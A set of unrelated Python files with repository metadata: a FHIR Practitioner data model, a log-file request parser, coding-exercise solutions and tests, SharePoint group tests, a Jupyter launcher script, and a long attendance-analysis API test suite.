212ff7bb2d292acfcdecc48ba1e36050aa9e18ed | 7b02411227428bb746e7622736dc006ee24ca925 | /fhirclient/models/practitioner.py | a031183a9a28ca6bf7c19c5f0c4696218a018c6b | [] | no_license | NCATS-Tangerine/CPKG | 81c74abaec8de75ad769724e84d893dec117cf97 | 92b6079d61bdb975a0a4bc08879f56b686ff08ef | refs/heads/master | 2022-12-10T17:55:52.586808 | 2019-08-20T20:19:56 | 2019-08-20T20:19:56 | 202,387,355 | 0 | 0 | null | 2022-12-08T06:01:57 | 2019-08-14T16:29:04 | Python | UTF-8 | Python | false | false | 3,478 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
practitioner to practice medicine within a certian locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js | [
"[email protected]"
] | |
b767dc6912417be37cab9363e2fe281e20c8e20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_lookouts.py | 435d7553390587072a7651b0c3278816d229a48a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py |
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
#calss header
class _LOOKOUTS(_LOOKOUT, ):
def __init__(self,):
_LOOKOUT.__init__(self)
self.name = "LOOKOUTS"
self.specie = 'nouns'
self.basic = "lookout"
self.jsondata = {}
| [
"[email protected]"
] | |
bb918660688b08138dfff3f921550e5811812b22 | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /dcsTools/logTools/LogAnalizer.py | b87902b91912124b60bb08ef9caa08a1222ab954 | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 2,332 | py | """
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
"""
split the log file into "blobs" which are defined as chunks of text separated by a blank line
if the blob contains output from the RequestProcessor, create a Request object
optionally, a sessionID can be passed to look for Requests from that session only
"""
if type (filters) == type ("blah"):
filters = [filters]
s = open (path, 'r').read()
blobs = s.split ("\n\n")
print "processing %d blobs" % len (blobs)
requests = []
for blob in blobs:
line1 = blob.split("\n")[0]
if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
try:
request = Request (blob)
except:
print "failed to contstruct Request:", sys.exc_type, sys.exc_value
continue
if filters:
if (eval (string.join (filters, " and "))):
requests.append (request)
## accept = True
## for filter in filters:
## if not (eval (filter)):
## accept = False
## break
## if accept:
## requests.append (request)
else:
requests.append (request)
return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
| [
"[email protected]"
] | |
f27e2f2cc8ef12eb3d323fbd3190a05d27836935 | 404a8596d3c4a55efe57e6fe5f2f19747a487e28 | /baekjoon/5565_receipt.py | aea7c94e573bc71e5e01f4d21b41b01260efb873 | [] | no_license | taehwan920/Algorithm | 370b72e48ba404ae1fb7a7786165b88a8daf090a | f837034d0c2f7cac370eb8cceacb8b3827ec62f9 | refs/heads/master | 2021-08-17T07:14:33.594428 | 2021-01-01T14:26:35 | 2021-01-01T14:26:35 | 237,892,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | n = int(input())
for i in range(9):
n -= int(input())
print(n)
| [
"[email protected]"
] | |
71d201020a8661345685b3fe0dcde8ba8c88b1f4 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /plus-one/test_solution.py | 574ad18d65637674d36fc84b6ad97ac231f5ded6 | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
| [
"[email protected]"
] | |
d4dcf28a56df6392227f886cba49f02edc0a4425 | 9152c6f5b692694c4cb95725319fc8dd21d30455 | /tests/test_sharepoint_group.py | 35ff7ddb18dd00b39d3d1f90d47262fff460b3cf | [
"MIT"
] | permissive | VISIN9/Office365-REST-Python-Client | cf3de86a6bdd2461ff5814dbfa02d4d4185917d5 | 91c07d427a76197f6eb143c6253bdc832cbb889d | refs/heads/master | 2021-05-25T08:43:35.530546 | 2020-04-06T20:24:53 | 2020-04-06T20:24:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|[email protected]"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
| [
"[email protected]"
] | |
edee59048bf7db2a486cc4da27fba9608ec32e7a | 909ae0ab0f4fe78de433c3d72b34b84848303ee8 | /lending-club/venv/bin/jupyter-kernel | d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c | [] | no_license | jakekasan/data-science | f5cf2a7c0ead56e04a3549b930ca974495faae49 | 4bf589c268c517525abf3170c24cf42e0ae872cf | refs/heads/master | 2021-09-17T21:18:51.278247 | 2018-07-05T07:31:51 | 2018-07-05T07:31:51 | 114,106,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
384b044a26741c3691f5aad15dccf32d43789fcd | 184310f55b58e854dc3b6c58599ef99bc4c95739 | /hujian_api/API_service/TestCase/Attendance_analyse_late_02.py | f08ad74fb962f34245281fa4384265995c3344b0 | [] | no_license | tanjijun1/Python_API | c8585821a627c399fea1ab31bb024be6b82dd3ab | 3c4771875870ffe425d2d39fc28a50449b1752f2 | refs/heads/master | 2023-01-07T23:30:30.284433 | 2020-11-11T08:43:10 | 2020-11-11T08:43:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,314 | py | import pytest
import allure
import requests
import json
import time
from Params.params import Login
from Params.params import Login_info
from Params.params import Password_reset
from Params.params import Log_info
from Params.params import Log_latest
from Params.params import Log_list
from Params.params import Attendance_groups_sync
from Params.params import Attendance_schedules_sync
from Params.params import Attendance_records_sync
from Params.params import Flow_sync
from Params.params import Department_sync
from Params.params import Department_list
from Params.params import Department_employees_list
from Params.params import Department_employee_query
from Params.params import Attendance_class_list
from Params.params import Attendance_analyse
from Params.params import Attendance_analyse_result
from Params.params import Attendance_analyse_result_statistics
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Attendance_analyse_late_02:
@allure.severity('normal')
@allure.feature('Attendance_analyse')
@allure.story('Attendance_analyse_late')
def test_late_02(self):
session_a = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
url_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&userIds=056621220036405378'
#分析 用户056621220036405378 2019年10月 考勤
res_2019_10 = get_req.get_model_a(session_a,url_2019_10)
time.sleep(10)
resCode_2019_10 = res_2019_10['code']
resText_2019_10 = res_2019_10['text']
#print(resText_2019_10)
assert ass.assert_code(resCode_2019_10, 200)
assert ass.assert_in_text(resText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年11月 考勤
res_2019_11 = get_req.get_model_a(session_a, url_2019_11)
time.sleep(10)
resCode_2019_11 = res_2019_11['code']
resText_2019_11 = res_2019_11['text']
#print(resText_2019_11)
assert ass.assert_code(resCode_2019_11, 200)
assert ass.assert_in_text(resText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年12月 考勤
res_2019_12 = get_req.get_model_a(session_a, url_2019_12)
time.sleep(10)
resCode_2019_12 = res_2019_12['code']
resText_2019_12 = res_2019_12['text']
#print(resText_2019_12)
assert ass.assert_code(resCode_2019_12, 200)
assert ass.assert_in_text(resText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&pageSize=31'
#获取 用户056621220036405378 2019年10月 考勤分析结果
res_result_2019_10 = get_req.get_model_a(session_a,url_result_2019_10)
res_resultCode_2019_10 = res_result_2019_10['code']
res_resultText_2019_10 = res_result_2019_10['text']
assert ass.assert_code(res_resultCode_2019_10, 200)
assert ass.assert_in_text(res_resultText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年11月 考勤分析结果
res_result_2019_11 = get_req.get_model_a(session_a, url_result_2019_11)
res_resultCode_2019_11 = res_result_2019_11['code']
res_resultText_2019_11 = res_result_2019_11['text']
assert ass.assert_code(res_resultCode_2019_11, 200)
assert ass.assert_in_text(res_resultText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年12月 考勤分析结果
res_result_2019_12 = get_req.get_model_a(session_a, url_result_2019_12)
res_resultCode_2019_12 = res_result_2019_12['code']
res_resultText_2019_12 = res_result_2019_12['text']
assert ass.assert_code(res_resultCode_2019_12, 200)
assert ass.assert_in_text(res_resultText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_10 = json.loads(res_resultText_2019_10)
resInfo_10_01 = res_resultDict_2019_10['result']['list'][0]
resInfo_10_02 = res_resultDict_2019_10['result']['list'][1]
resInfo_10_03 = res_resultDict_2019_10['result']['list'][2]
resInfo_10_04 = res_resultDict_2019_10['result']['list'][3]
resInfo_10_05 = res_resultDict_2019_10['result']['list'][4]
resInfo_10_06 = res_resultDict_2019_10['result']['list'][5]
resInfo_10_07 = res_resultDict_2019_10['result']['list'][6]
resInfo_10_08 = res_resultDict_2019_10['result']['list'][7]
resInfo_10_09 = res_resultDict_2019_10['result']['list'][8]
resInfo_10_10 = res_resultDict_2019_10['result']['list'][9]
resInfo_10_11 = res_resultDict_2019_10['result']['list'][10]
resInfo_10_12 = res_resultDict_2019_10['result']['list'][11]
resInfo_10_13 = res_resultDict_2019_10['result']['list'][12]
resInfo_10_14 = res_resultDict_2019_10['result']['list'][13]
resInfo_10_15 = res_resultDict_2019_10['result']['list'][14]
resInfo_10_16 = res_resultDict_2019_10['result']['list'][15]
resInfo_10_17 = res_resultDict_2019_10['result']['list'][16]
resInfo_10_18 = res_resultDict_2019_10['result']['list'][17]
resInfo_10_19 = res_resultDict_2019_10['result']['list'][18]
resInfo_10_20 = res_resultDict_2019_10['result']['list'][19]
resInfo_10_21 = res_resultDict_2019_10['result']['list'][20]
resInfo_10_22 = res_resultDict_2019_10['result']['list'][21]
resInfo_10_23 = res_resultDict_2019_10['result']['list'][22]
resInfo_10_24 = res_resultDict_2019_10['result']['list'][23]
resInfo_10_25 = res_resultDict_2019_10['result']['list'][24]
resInfo_10_26 = res_resultDict_2019_10['result']['list'][25]
resInfo_10_27 = res_resultDict_2019_10['result']['list'][26]
resInfo_10_28 = res_resultDict_2019_10['result']['list'][27]
resInfo_10_29 = res_resultDict_2019_10['result']['list'][28]
resInfo_10_30 = res_resultDict_2019_10['result']['list'][29]
resInfo_10_31 = res_resultDict_2019_10['result']['list'][30]
assert ass.assert_in_text(resInfo_10_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_05, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_06, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_09, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_17, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_29, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_31, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_11 = json.loads(res_resultText_2019_11)
resInfo_11_01 = res_resultDict_2019_11['result']['list'][0]
resInfo_11_02 = res_resultDict_2019_11['result']['list'][1]
resInfo_11_03 = res_resultDict_2019_11['result']['list'][2]
resInfo_11_04 = res_resultDict_2019_11['result']['list'][3]
resInfo_11_05 = res_resultDict_2019_11['result']['list'][4]
resInfo_11_06 = res_resultDict_2019_11['result']['list'][5]
resInfo_11_07 = res_resultDict_2019_11['result']['list'][6]
resInfo_11_08 = res_resultDict_2019_11['result']['list'][7]
resInfo_11_09 = res_resultDict_2019_11['result']['list'][8]
resInfo_11_10 = res_resultDict_2019_11['result']['list'][9]
resInfo_11_11 = res_resultDict_2019_11['result']['list'][10]
resInfo_11_12 = res_resultDict_2019_11['result']['list'][11]
resInfo_11_13 = res_resultDict_2019_11['result']['list'][12]
resInfo_11_14 = res_resultDict_2019_11['result']['list'][13]
resInfo_11_15 = res_resultDict_2019_11['result']['list'][14]
resInfo_11_16 = res_resultDict_2019_11['result']['list'][15]
resInfo_11_17 = res_resultDict_2019_11['result']['list'][16]
resInfo_11_18 = res_resultDict_2019_11['result']['list'][17]
resInfo_11_19 = res_resultDict_2019_11['result']['list'][18]
resInfo_11_20 = res_resultDict_2019_11['result']['list'][19]
resInfo_11_21 = res_resultDict_2019_11['result']['list'][20]
resInfo_11_22 = res_resultDict_2019_11['result']['list'][21]
resInfo_11_23 = res_resultDict_2019_11['result']['list'][22]
resInfo_11_24 = res_resultDict_2019_11['result']['list'][23]
resInfo_11_25 = res_resultDict_2019_11['result']['list'][24]
resInfo_11_26 = res_resultDict_2019_11['result']['list'][25]
resInfo_11_27 = res_resultDict_2019_11['result']['list'][26]
resInfo_11_28 = res_resultDict_2019_11['result']['list'][27]
resInfo_11_29 = res_resultDict_2019_11['result']['list'][28]
resInfo_11_30 = res_resultDict_2019_11['result']['list'][29]
assert ass.assert_in_text(resInfo_11_01, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_07, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_08, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_12, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_15, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_17, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_18, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_21, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_22, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_25, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_29, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_12 = json.loads(res_resultText_2019_12)
resInfo_12_01 = res_resultDict_2019_12['result']['list'][0]
resInfo_12_02 = res_resultDict_2019_12['result']['list'][1]
resInfo_12_03 = res_resultDict_2019_12['result']['list'][2]
resInfo_12_04 = res_resultDict_2019_12['result']['list'][3]
resInfo_12_05 = res_resultDict_2019_12['result']['list'][4]
resInfo_12_06 = res_resultDict_2019_12['result']['list'][5]
resInfo_12_07 = res_resultDict_2019_12['result']['list'][6]
resInfo_12_08 = res_resultDict_2019_12['result']['list'][7]
resInfo_12_09 = res_resultDict_2019_12['result']['list'][8]
resInfo_12_10 = res_resultDict_2019_12['result']['list'][9]
resInfo_12_11 = res_resultDict_2019_12['result']['list'][10]
resInfo_12_12 = res_resultDict_2019_12['result']['list'][11]
resInfo_12_13 = res_resultDict_2019_12['result']['list'][12]
resInfo_12_14 = res_resultDict_2019_12['result']['list'][13]
resInfo_12_15 = res_resultDict_2019_12['result']['list'][14]
resInfo_12_16 = res_resultDict_2019_12['result']['list'][15]
resInfo_12_17 = res_resultDict_2019_12['result']['list'][16]
resInfo_12_18 = res_resultDict_2019_12['result']['list'][17]
resInfo_12_19 = res_resultDict_2019_12['result']['list'][18]
resInfo_12_20 = res_resultDict_2019_12['result']['list'][19]
resInfo_12_21 = res_resultDict_2019_12['result']['list'][20]
resInfo_12_22 = res_resultDict_2019_12['result']['list'][21]
resInfo_12_23 = res_resultDict_2019_12['result']['list'][22]
resInfo_12_24 = res_resultDict_2019_12['result']['list'][23]
resInfo_12_25 = res_resultDict_2019_12['result']['list'][24]
resInfo_12_26 = res_resultDict_2019_12['result']['list'][25]
resInfo_12_27 = res_resultDict_2019_12['result']['list'][26]
assert ass.assert_in_text(resInfo_12_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_03, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_10, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_11, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_13, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_16, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_17, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_19, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_20, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_23, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_24, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_26, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_27, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
if __name__ == '__main__':
a = Attendance_analyse_late_02()
a.test_late_02()
| [
"[email protected]"
] | |
3278d42f28e4adebbe01bf582c688739941488df | 8e95e79840005f6c34dfb978e8fe6e0ec4f7f643 | /9_Introduction to PySpark_/33_Test vs Train.py | 658938186f8e89f8ce821abc3d047cec0a15515f | [] | no_license | Naysla/Machine_Learning | a0593cac41ef1561f14bec55780570b82fc37720 | e75d5cd2894ccb005228ab3da87dde9025385a08 | refs/heads/master | 2023-02-01T17:19:32.413609 | 2020-12-22T20:36:45 | 2020-12-22T20:36:45 | 323,708,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #Test vs Train
